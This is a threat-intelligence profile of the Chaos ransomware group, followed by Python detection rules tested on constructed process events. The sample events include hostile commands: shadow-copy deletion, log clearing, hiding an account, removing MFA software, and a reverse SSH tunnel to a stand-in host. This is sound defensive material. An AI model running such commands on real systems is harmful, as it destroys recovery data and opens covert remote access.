Chaos
Chaos is a ransomware-as-a-service (RaaS) operation that emerged in early 2025 (around February). Cisco Talos assesses with moderate confidence that it was likely formed by former BlackSuit/Royal members, placing it in the broader Royal/Conti lineage. It is distinct from the older 2021 Chaos ransomware builder and the builder-generated variants that share its name. Chaos runs an open affiliate program recruited on the RAMP dark web forum, and continued recruiting after the July 24, 2025 seizure of BlackSuit infrastructure; it has been referred to as a BlackSuit successor or an ex-Royal operation. The group advertises cross-platform ransomware for Windows, Linux, ESXi and NAS systems, and claims to exclude CIS/BRICS countries, hospitals and, in some reporting, government entities from targeting.

Chaos is associated with big-game hunting and double extortion; some reporting also describes triple extortion through added DDoS threats. Victim selection appears opportunistic across sectors, with a strong concentration in the United States; technology and manufacturing are repeatedly identified among the most affected sectors. Public reporting tracks victim counts on the group's leak site and shows recurring activity through 2025 and into 2026.

Observed tradecraft leans heavily on social engineering for initial access: spam flooding (email bombing) followed by voice phishing in which operators impersonate IT or security staff and persuade the victim to launch Microsoft Quick Assist. Secondary access paths include exploitation of unpatched edge devices and compromised RDP credentials. For persistence and remote access, Chaos deploys multiple RMM tools, including AnyDesk, ScreenConnect, OptiTune, Syncro RMM and Splashtop Streamer, as well as reverse SSH tunnels over port 443.

Post-compromise activity includes domain controller and trust enumeration, LDAP queries, reverse DNS lookups, logged-in user discovery, process listing, credential harvesting with Mimikatz, Kerberoasting, password resets with net.exe, token impersonation, and lateral movement over RDP, via Impacket over SMB/WMI, and through the deployed remote management tools. Defense evasion and recovery inhibition include clearing PowerShell event logs, attempting to uninstall security or MFA software via WMIC, hiding accounts from the logon screen through the Winlogon SpecialAccounts\UserList registry key, and deleting shadow copies with vssadmin. Data exfiltration has been observed using GoodSync renamed to wininit.exe, masquerading as the legitimate Windows process of that name.

The ransomware appends the .chaos extension and drops ransom notes named README.chaos.txt or readme.chaos.txt. Reporting states that it uses Curve25519 ECDH with AES-256 and a unique key per file, supports selective partial-file encryption, and threatens publication of stolen data if the victim does not pay. Observed ransom demands have reached $300,000, and pressure has included data leakage, DDoS and reputational threats.

Aliases and descriptors used in reporting include BlackSuit successor, ex-Royal, and former BlackSuit/Royal operators. Former BlackSuit affiliates are reported to have dispersed to other groups including Chaos, INC, Lynx, Cactus and Nokoyawa. Separately, Rapid7 reported that the Iranian state-sponsored group MuddyWater masqueraded as Chaos in at least one intrusion to conceal espionage activity; this is abuse of the Chaos brand, not attribution of Chaos itself to Iran.
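As an added example (not code from the original page or from any of the vendors cited), the following Python turns the defense-evasion, recovery-inhibition, exfiltration and tunnelling behaviours above into detection rules and runs them over constructed Sysmon-style process-creation records: vssadmin shadow deletion, the SpecialAccounts\UserList hide, PowerShell log clearing, WMIC product uninstalls, a wininit.exe running outside System32, reverse SSH to port 443, and the RMM binaries named in reporting. The sample events, the field names (Sysmon event ID 1: Image, CommandLine, ParentImage) and the empty approved-RMM allowlist are assumptions.

```python
"""Detection rules for Chaos post-compromise tradecraft over Sysmon-style
process-creation events. Added example, not code from the page or any vendor.
The sample events below are constructed, not real telemetry."""
import ntpath
import re
from typing import Callable

SYSTEM32 = r"c:\windows\system32"
# Product names of RMM tools reported in Chaos intrusions (substring match on Image).
RMM_MARKERS = ("anydesk", "screenconnect", "optitune", "syncro", "splashtop")
# Assumption: the organisation sanctions none of them. Add names here to suppress alerts.
APPROVED_RMM: set[str] = set()


def _base(e: dict) -> str:
    return ntpath.basename(e["Image"]).lower()


def _cmd(e: dict) -> str:
    return e.get("CommandLine", "").lower()


def shadow_copy_deletion(e: dict) -> bool:
    # "vssadmin delete shadows": recovery inhibition just before encryption.
    return _base(e) == "vssadmin.exe" and re.search(r"delete\s+shadows", _cmd(e)) is not None


def hidden_account(e: dict) -> bool:
    # A DWORD 0 under Winlogon\SpecialAccounts\UserList hides the account from the logon UI.
    c = _cmd(e)
    return r"specialaccounts\userlist" in c and re.search(r"(/d|-value)\s+0\b", c) is not None


def powershell_log_cleared(e: dict) -> bool:
    c = _cmd(e)
    via_wevtutil = _base(e) == "wevtutil.exe" and re.search(r"\bcl\b", c) is not None
    return (via_wevtutil or "clear-eventlog" in c) and "powershell" in c


def wmic_product_uninstall(e: dict) -> bool:
    # "wmic product ... call uninstall" is how security/MFA agents were removed.
    c = _cmd(e)
    return _base(e) == "wmic.exe" and "product" in c and re.search(r"call\s+uninstall", c) is not None


def masquerading_wininit(e: dict) -> bool:
    # The real wininit.exe only runs from System32; GoodSync renamed to that name will not.
    return _base(e) == "wininit.exe" and ntpath.dirname(e["Image"]).lower() != SYSTEM32


def reverse_ssh_over_443(e: dict) -> bool:
    # "ssh -R ..." to a server listening on 443: the reverse tunnel reported in Chaos intrusions.
    raw, c = e.get("CommandLine", ""), _cmd(e)
    remote_fwd = re.search(r"(?<!\S)-R\s", raw) is not None  # -R is case-sensitive in ssh
    port_443 = re.search(r"-p\s*443\b", c) or re.search(r":443\b", c)
    return _base(e) in {"ssh.exe", "ssh"} and remote_fwd and port_443 is not None


def unapproved_rmm(e: dict) -> bool:
    img = e["Image"].lower()
    return any(m in img for m in RMM_MARKERS if m not in APPROVED_RMM)


RULES: list[tuple[str, Callable[[dict], bool]]] = [
    ("shadow_copy_deletion", shadow_copy_deletion),
    ("hidden_account", hidden_account),
    ("powershell_log_cleared", powershell_log_cleared),
    ("wmic_product_uninstall", wmic_product_uninstall),
    ("masquerading_wininit", masquerading_wininit),
    ("reverse_ssh_over_443", reverse_ssh_over_443),
    ("unapproved_rmm", unapproved_rmm),
]


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule each event trips."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES if rule(e)]


# Constructed sample telemetry; events 1 and 6 are benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},
    {"Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v svc_backup /t REG_DWORD /d 0 /f'},
    {"Image": r"C:\Windows\System32\wevtutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wevtutil cl "Microsoft-Windows-PowerShell/Operational"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic product where \"name like '%MFA%'\" call uninstall /nointeractive"},
    {"Image": r"C:\Users\Public\wininit.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wininit.exe /sync"},
    {"Image": r"C:\Windows\System32\wininit.exe", "ParentImage": r"C:\Windows\System32\smss.exe",
     "CommandLine": "wininit.exe"},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "ssh -N -R 2222:127.0.0.1:3389 -p 443 user@198.51.100.7"},
    {"Image": r"C:\Users\Public\Downloads\AnyDesk.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "AnyDesk.exe --silent"},
]

if __name__ == "__main__":
    for i, name in scan(SAMPLE_EVENTS):
        print(f"[{name}] event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Each rule is deliberately narrow so it can be tuned against real telemetry: backup jobs and administrators also delete shadow copies and clear logs, so correlate hits with ParentImage, the launching user, and whether a Quick Assist or RMM session preceded them, rather than alerting on any single rule in isolation.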
Tradecraft
23 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Ransomware group appearing in the top incident rankings during the reporting period.
Named as one of the groups that absorbed affiliates after the Black Basta collapse.
Ransomware-as-a-service operation active since early 2025, recruiting affiliates via the RAMP forum and conducting double-extortion style victim shaming/leak operations across multiple sectors.
Referenced as another ransomware program, with uncertainty about whether it would accept a supplier or maintain the relationship.